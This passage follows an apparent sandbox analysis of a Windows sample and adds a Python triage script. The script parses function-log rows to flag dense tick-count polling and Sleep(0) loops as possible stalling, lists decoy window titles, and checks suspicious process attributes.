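The thread log above ends in a long run of System Get Time (Ticks) rows with rising Count values, interleaved with zero-length Sleep calls, after the VB6 runtime (msvbvm60.dll, ThunderRT6Main) has put up windows titled Sorting Algorithm Comparison, RadixSort, MergeSort and QuickSort. Read together with the process header (parent dllhost.exe, High integrity, image under AppData\Roaming, Is Created or Modified Executable = True), that is the picture an analyst wants a script to surface rather than scroll for. The Python below is an added triage example, not VMRay code: it parses rows in the exact Category Operation Information Success Count layout printed here, measures how densely the tick counter is polled and how many zero-length sleeps occur, lists the created window titles, and checks the process record. The row excerpt and the process dictionary are constructed from the tables above; the thresholds in flag_stalling are assumptions for illustration. A tight tick-count/Sleep(0) loop is consistent with a busy-wait delay, but it can also be ordinary GUI-runtime polling, so the heuristic only surfaces the pattern for review.

```python
"""Added triage example (not VMRay code) for function-log rows in the format
Category Operation Information Success Count, as printed in the thread table."""
import re

# Constructed excerpt of rows from thread 0x6a0 above (Count column preserved).
SAMPLE_LOG = """\
Window Create class_name = ThunderRT6Main, wndproc_parameter = 0 True 1
Window Create window_name = Sorting Algorithm Comparison, wndproc_parameter = 0 True 1
Window Create window_name = RadixSort, wndproc_parameter = 0 True 1
Window Create window_name = MergeSort, wndproc_parameter = 0 True 1
Window Create window_name = QuickSort, wndproc_parameter = 0 True 1
Window Create wndproc_parameter = 0 True 1
System Get Time type = Local Time, time = 2018-06-26 00:54:45 (Local Time) True 1
System Get Time type = Ticks, time = 273968 True 5
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
System Get Time type = Ticks, time = 273984 True 5
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
System Get Time type = Ticks, time = 274000 True 5
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
System Get Time type = Ticks, time = 274265 True 25
System Get Time type = Ticks, time = 274280 True 35
System Get Time type = Ticks, time = 274296 True 40
System Get Time type = Ticks, time = 274312 True 40
"""

# Constructed from the OS Process Information table for process #22.
SAMPLE_PROCESS = {
    "File Name": r"c:\users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe",
    "Parent PID": r"0x200 (c:\windows\syswow64\dllhost.exe)",
    "Integrity Level": "High (Elevated)",
    "Is Created or Modified Executable": "True",
}

# Operation words are capitalised (Get Time, Sleep, Create); the info field starts lowercase.
ROW = re.compile(
    r"^(?P<cat>\w+) (?P<op>[A-Z]\w*(?: [A-Z]\w*)*) (?P<info>.*?) (?P<ok>True|False) (?P<n>\d+)$"
)
TICKS = re.compile(r"type = Ticks, time = (\d+)")
TITLE = re.compile(r"window_name = (.*?), wndproc_parameter")


def parse_rows(text):
    """Yield (category, operation, info, success, count) for each well-formed row."""
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            yield m["cat"], m["op"], m["info"], m["ok"] == "True", int(m["n"])


def timing_profile(text):
    """Count tick-count polls and zero-length sleeps, and the tick span they cover."""
    polls, sleeps0, ticks = 0, 0, []
    for cat, op, info, _ok, n in parse_rows(text):
        if cat == "System" and op == "Get Time":
            t = TICKS.search(info)
            if t:
                polls += n
                ticks.append(int(t.group(1)))
        elif cat == "System" and op == "Sleep" and info.startswith("duration = 0 "):
            sleeps0 += n
    span_ms = max(ticks) - min(ticks) if len(ticks) > 1 else 0
    rate = polls * 1000.0 / span_ms if span_ms else 0.0
    return {"tick_polls": polls, "sleep0": sleeps0, "span_ms": span_ms, "polls_per_sec": rate}


def flag_stalling(profile, min_polls=50, min_rate=200.0):
    """Assumed thresholds: a busy-wait shows many polls packed into a short tick span."""
    return profile["tick_polls"] >= min_polls and profile["polls_per_sec"] >= min_rate


def window_titles(text):
    """Titles of windows the sample created; a GUI facade is a common crypter decoy."""
    titles = []
    for cat, op, info, _ok, _n in parse_rows(text):
        if cat == "Window" and op == "Create":
            m = TITLE.match(info)
            if m:
                titles.append(m.group(1))
    return titles


def check_process(info):
    """Findings from the process record that matter regardless of what the log shows."""
    findings = []
    path = info.get("File Name", "").lower()
    if "dllhost.exe" in info.get("Parent PID", "").lower() and "\\appdata\\" in path:
        findings.append("launched by dllhost.exe from a user-profile path")
    if info.get("Integrity Level", "").startswith("High") and path.startswith("c:\\users\\"):
        findings.append("runs at High integrity from a user-writable location")
    if info.get("Is Created or Modified Executable") == "True":
        findings.append("image was created or modified during the analysis")
    return findings


if __name__ == "__main__":
    prof = timing_profile(SAMPLE_LOG)
    print(prof, "stalling" if flag_stalling(prof) else "no stalling")
    print(window_titles(SAMPLE_LOG))
    print(check_process(SAMPLE_PROCESS))
```

Feeding the full thread table to timing_profile gives a far denser poll rate than the excerpt, since the Count column climbs to 40 per 16 ms tick step; the point of the span-based rate is that a legitimately idle message loop spreads its polls over a long span, while a delay loop packs them into a short one.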